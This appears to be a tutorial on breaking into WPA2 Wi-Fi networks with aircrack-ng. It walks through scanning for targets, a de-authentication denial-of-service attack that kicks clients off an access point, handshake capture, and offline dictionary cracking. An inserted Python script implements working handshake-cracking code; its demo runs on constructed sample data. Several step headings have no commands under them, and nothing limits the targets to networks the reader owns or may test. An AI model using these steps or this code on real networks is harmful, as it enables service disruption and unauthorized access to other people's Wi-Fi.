Hack WPA2 Networks
Install Aircrack-ng On Your Machine
Put the Network Interface Card in Monitor Mode
Identify the Wireless Network Card
Run The Below Commands
Look For Targets
Scan A Specific Target
Capture the Handshake
Performing DoS on the AP
You can use aireplay-ng or mdk4 to disconnect devices from an AP for a while. This is called a de-authentication attack, a form of wireless DoS (Denial-of-Service) attack. The point of it here is not the outage itself: when a kicked client reconnects, it performs a fresh WPA2 4-way handshake with the AP, and that handshake is what we want to capture.
Now here’s the game plan:
Setup airodump-ng to capture packets and save them
De-authenticate the device for some time while airodump-ng is running
Capture the handshake
1. Setup airodump-ng to capture packets and save them
Here, we're using the -c flag to lock the card to the AP's channel, the --bssid flag for the MAC address of the AP, and the -w flag to give a file prefix to save the captured packets to (airodump-ng appends a counter and extension, so -w capture produces capture-01.cap).
Quick lesson: Channels reduce the chances of APs interfering with each other. When running airodump-ng without -c it hops across channels, so it would miss handshake frames sent while it is listening elsewhere; pin it to the AP's channel, which you can read under the CH column of the scan.
2. Run the De-Authentication Attack
The -a flag specifies the MAC address of the AP, and --deauth takes the number of de-authentication bursts to send (0 means keep sending until you stop it), followed by the monitor-mode interface. Without a target client, the deauth frames are broadcast to every station on the AP; add -c with a client's MAC address to kick only that device.
3. Capture the Handshake
While the de-authentication attack is underway, check on your airodump-ng scan. You should see in the top right: WPA handshake: <mac address>. Once you have verified that, you can stop the de-authentication attack and the airodump-ng scan. If no client is connected to the AP there is nobody to kick and reconnect, so no handshake will ever appear; look at the STATION list in the scan before deciding the attack has failed.
Cracking the Captured Password
The PMK (Pairwise Master Key) is derived from the passphrase and the network name: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). The PMK itself cannot be checked against the capture; instead, for each word in the wordlist, the cracker derives the PMK, combines it with the AP and client MAC addresses and the two nonces from the handshake to get the PTK, and uses the first 128 bits of the PTK (the KCK) to recompute the MIC over a captured EAPOL message. If the recomputed MIC matches the captured one, the word is the password; if not, it skips to the next word on the list. aircrack-ng does exactly this when given the capture file, the target BSSID and a wordlist with -w. Note what this implies: the handshake leaks nothing by itself, and a long random passphrase that is not in any wordlist is not recoverable this way.
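The check described above, written out as an added example (this is not the page's code and not aircrack-ng's code): derive PMK, PTK and KCK for each candidate and compare the recomputed MIC with the one in EAPOL message 2. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed here; the "captured" message 2 is built by the script itself under a known passphrase so that the whole chain can be verified end to end. The PBKDF2 and PRF details follow IEEE 802.11i for WPA2 with the SHA-1 based AKM (key descriptor version 2).

```python
# Added example: offline WPA2-PSK handshake verification (PMK -> PTK -> KCK -> MIC).
# All inputs below are constructed for illustration; nothing here is a real capture.
import hashlib
import hmac

# EAPOL header(4) + descriptor type(1) + key info(2) + key length(2) + replay counter(8)
# + nonce(32) + key IV(16) + key RSC(8) + key ID(8) = 81 bytes before the 16-byte MIC.
EAPOL_MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits) per IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK via the 802.11i SHA-1 PRF (AKM 00-0F-AC:2). Bytes 0..15 of the PTK are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # 3 x 20 bytes covers the 48-byte PTK needed for CCMP
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1-128 over the frame with the MIC field zeroed."""
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol_frame[EAPOL_MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Construct a minimal EAPOL-Key message 2 (key info 0x010a: v2, pairwise, MIC) and fill in its MIC."""
    body = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: version 2, pairwise, MIC present
        + b"\x00\x00"              # key length (0 in message 2)
        + (1).to_bytes(8, "big")   # replay counter
        + snonce                   # SNonce chosen by the client
        + b"\x00" * 16             # key IV
        + b"\x00" * 8              # key RSC
        + b"\x00" * 8              # key ID
        + b"\x00" * 16             # MIC placeholder, filled below
        + b"\x00\x00"              # key data length (a real message 2 carries the RSN IE here)
    )
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL version 1, type 3 = Key
    mic = eapol_mic(kck, frame)
    return frame[:EAPOL_MIC_OFFSET] + mic + frame[EAPOL_MIC_OFFSET + 16:]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Return the first candidate whose derived KCK reproduces the MIC in msg2, else None."""
    captured = msg2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for word in wordlist:
        if not 8 <= len(word) <= 63:
            continue  # not a legal WPA2 passphrase length; no point deriving a PMK for it
        pmk = pmk_from_passphrase(word, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured):
            return word
    return None


# Constructed sample handshake (hypothetical network, not a real capture).
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("02aabbccdd01")
STA_MAC = bytes.fromhex("02aabbccdd02")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "correct horse"
_kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
MSG2 = build_msg2(SNONCE, _kck)
WORDLIST = ["short", "password", "letmein123", "correct horse", "Tr0ub4dor&3"]

if __name__ == "__main__":
    print("recovered:", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, MSG2, WORDLIST))
```

The cost is dominated by the 4096-round PBKDF2 per candidate, which is why wordlist quality matters far more than the verification step, and why tools precompute PMKs per SSID when the same network is attacked repeatedly.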
END: Put Your Network Card In Managed Mode
To clean up, remove the capture files, close your terminals, take the interface out of monitor mode with airmon-ng, and run the command service NetworkManager restart so that your network card is back in managed mode and you can connect to Wi-Fi again.